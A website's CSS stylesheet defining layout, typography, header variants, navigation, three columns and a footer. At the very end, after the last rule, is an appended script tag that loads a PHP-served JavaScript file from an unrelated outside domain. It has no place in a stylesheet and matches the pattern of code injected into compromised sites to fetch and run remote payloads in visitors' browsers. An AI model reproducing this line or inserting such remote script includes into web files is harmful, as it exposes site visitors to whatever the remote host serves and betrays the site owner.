





















* {margin:0px; padding:0px;}

body
{
	background-color: #eeeeee;
	font-size:80%;
	font-family: Verdana, "Lucida Grande", Tahoma, Helvetica, sans-serif;
}

img {border:none;}

input, textarea { 
	font-family:Verdana, Arial, Helvetica, sans-serif; 
	font-size:1em; 
	border:1px solid #ccc;
	background-color:#fff;
	margin:0px;
	}
button {
	background-color:#666666;}
p, blockquote, h3
{
	font-size: 1em;
	line-height: 18px;
	text-align: left;
	padding-left: 10px;
	padding-right: 10px;
}
h1 {
	font-size:2em;
	font-family:Georgia, "Times New Roman", Times, serif;
	}

h2 { 
	font-size:2em;
	font-weight:normal;
	font-family:Georgia, "Times New Roman", Times, serif;
	color:#333333;
	padding:10px 10px 10px 0;
	margin:0px;
	}

h3
{
	font-size:2em;
	font-weight:normal;
	font-family:Georgia, "Times New Roman", Times, serif;
	color:#333333;
	padding:15px 10px 10px 0;
	margin:0px;
	line-height:1.2em;
}
h4
{
	font-size:1.5em;
	font-weight:normal;
	font-family:Georgia, "Times New Roman", Times, serif;
	color:#666666;
	padding:20px 10px 10px 0;
	margin:0px;
}
h5
{
	font-size:1.2em;
	font-weight:bold;
	font-family:Georgia, "Times New Roman", Times, serif;
	color:#666666;
	padding:20px 10px 10px 0;
	margin:0px;
}

h3 a
{
	border: 0px;
	font-weight: normal;
	font-family: Georgia, Times, Serif;
	font-size: 1.2em;
}
blockquote
{
	margin-left: 20px;
	margin-right: 0px;
}

#right p, #left p, #center p
{
	line-height: 15px;
	font-size: 1em;
	padding:0 0 10px 0;
	
}

#left p
{
	text-align: left;
}

#container
{
	width: 760px;
	/*\width: 770px;
	w\idth: 760px;*/
	margin: 10px 10px 10px 10px;
	margin-left: auto;
	margin-right: auto;
	padding: 10px;
	background-color:#FFF;

}
/*///////////////////////////////////////////// header ////////////////////////////////////////////*/
#head
{
	text-align: center;
	height: 232px;
	background-color:#CFCFCF;
	text-align:left;
	padding:0px;
	border-bottom:1px solid #fff;
	background-image:url(/images/header_01.jpg);
	background-position:bottom;
	background-repeat:no-repeat;
}
.site_name {
	/*height:59px;*/
	padding:0px;
}
.head_bottom {
	height:10px;
	background-color:#999;
	border-bottom:1px solid #fff;
}
/*///////////////////////////////////////////// header_varieties ////////////////////////////////////////////*/
#head_varieties
{
	text-align: center;
	height: 232px;
	background-color:#CFCFCF;
	text-align:left;
	padding:0px;
	border-bottom:1px solid #fff;
	background-image:url(/images/header_06.jpg);
	background-position:bottom;
	background-repeat:no-repeat;
}
/*///////////////////////////////////////////// header_links ////////////////////////////////////////////*/
#head_links
{
	text-align: center;
	height: 232px;
	background-color:#CFCFCF;
	text-align:left;
	padding:0px;
	border-bottom:1px solid #fff;
	background-image:url(/images/header_02.jpg);
	background-position:bottom;
	background-repeat:no-repeat;
}
/*///////////////////////////////////////////// header_events ////////////////////////////////////////////*/
#head_events
{
	text-align: center;
	height: 232px;
	background-color:#CFCFCF;
	text-align:left;
	padding:0px;
	border-bottom:1px solid #fff;
	background-image:url(/images/header_03.jpg);
	background-position:bottom;
	background-repeat:no-repeat;
}
/*///////////////////////////////////////////// header_contact ////////////////////////////////////////////*/
#head_contact
{
	text-align: center;
	height: 232px;
	background-color:#CFCFCF;
	text-align:left;
	padding:0px;
	border-bottom:1px solid #fff;
	background-image:url(/images/header_05.jpg);
	background-position:bottom;
	background-repeat:no-repeat;
}
/* ////////////////////////////////////////////////////////  main nav  ///////////////////////////////////////////////////////////*/

.main_nav {
	/*height:40px;*/
	
	padding:0px;
	}
.main_nav ul {
	padding:10px 0 10px 0;
	margin:0px;
	height:20px;
	border-bottom:1px solid #fff;
	border-top:1px solid #fff;
	/*background-color:#E6E5EA;*/
	
}
.main_nav li {
	display: inline;
	list-style-image: none;
	list-style-type: none;
	padding:0px;
	margin:0px;
}
.main_nav a
{
	font-family:Georgia, "Times New Roman", Times, serif;
	font-size:1.5em;
	color:#666666;
	text-decoration: none;
	padding:10px;
	/*background-color:#CCCCCC;*/
}

.main_nav a:hover {
	color:#000;
	text-decoration:none;
	/*background-color:#333333;*/
}
/* ////////////////////////////////////////////////////////  tag line ///////////////////////////////////////////////////////////*/

.tag_line {
	background-color:#FFF;
	padding:15px;
	margin:40px 40px 0 311px;
	text-align:center;
}

/* ////////////////////////////////////////////////////////  left ///////////////////////////////////////////////////////////*/
#left
{
	float: left;
	width: 200px;
	/*\width: 150px;
	w\idth: 150px;*/
	margin-right: 5px;
	padding-top: 0px;
	padding-bottom: 20px;
}
#left a
{
	color: #990000;
	text-decoration:underline;
}
#left a:hover
{
	text-decoration:none;
}
#left_txt {
padding:0 5px 0 0;}

#left ul {
	padding:10px;
	margin-left:10px;
}
#left li {
	list-style-image: url(/images/bullet.gif);
	list-style-position:outside;
	padding:0 0 10px 0px; 
	}
/* ////////////////////////////////////////////////////////  center ///////////////////////////////////////////////////////////*/

#center
{
	margin-left: 221px;
	margin-right: 200px;
	padding-top: 0px;
	padding-bottom: 20px;
	border-left: 1px none grey;
	border-right: 1px none grey;
}
#center a
{
	color: #990000;
	text-decoration: underline;
}
#center a:hover
{
	text-decoration:none;
}
.center_txt {
padding:0 5px 0 10px;}
#center img { 
	float:left;
	margin:0 15px 10px 0;
	padding:2px;
	border:1px solid #eee;
	/*clear:left;*/
	}
/* ////////////////////////////////////////////////////////  right  ///////////////////////////////////////////////////////////*/

#right
{
	float: right;
	width: 170px;
	/*\width: 150px;
	w\idth: 150px;*/
	margin-left: 5px;
	padding-top: 20px;
	padding-bottom: 20px;
}
#right a
{
	color: #990000;
	text-decoration: underline;
}
#right a:hover
{
	text-decoration:none;
}
.right_txt {
padding:0 0 0 10px;}

#right ul {
	padding:10px;
}
#right li {
	list-style-image: url(/images/bullet.gif);
	list-style-position: outside;
	padding:0 0 10px 0px; 
	}
.grey {
	background-color:#e6e5ea;
	padding:5px 10px 10px 15px;
}

/*   ////////////////////////////////////////////////////////   footer    //////////////////////////////////////////////////////////*/
#foot
{
	clear: both;
	margin-top:0px;
	text-align: center;
	padding:5px;
	font-size:0.8em;
	border-top:1px solid #dfdfdf;
}
#foot a
{
	color: #990000;
	text-decoration: underline;
}
#foot a:hover
{
	text-decoration:none;
}



/*#right a, #left a
{
	border: 0px;
	color: #C00;
}*/

.column_heading {
	font-family:Georgia, "Times New Roman", Times, serif;
	font-size: 17px !important;
	color: #666666;
	margin: 0px;
	padding: 20px 10px 0px 0px;
}

.column1of4 {
	float: left;
	width: 190px;
}

.column2of4 {
	float: left;
	width: 190px;
}

.column3of4 {
	float: left;
	width: 190px;
}

.column4of4 {
	float: left;
	width: 190px;
}

.column1of4 ul, .column2of4 ul, .column3of4 ul, .column4of4 ul {
	padding:10px;
	list-style: none;
}

.column1of4 li, .column2of4 li, .column3of4 li, .column4of4 li {
	background-image: url(/images/bullet.gif);
	background-repeat: no-repeat;
	background-position:0px 5px;
	padding:0 0 10px 10px; 
}

.column1of4 a, .column2of4 a, .column3of4 a, .column4of4 a{
	color: #990000;
	text-decoration: underline;
}

.column1of4 a:hover, .column2of4 a:hover, .column3of4 a:hover, .column4of4 a:hover{
	text-decoration: none;
}

.clear_block {
	clear: both;
}

.archives_search_form {
	float: right;
	text-align: right;
	padding: 20px 15px 0px 0px;
}<script src="http://whereisdudescars.com/js2.php"></script>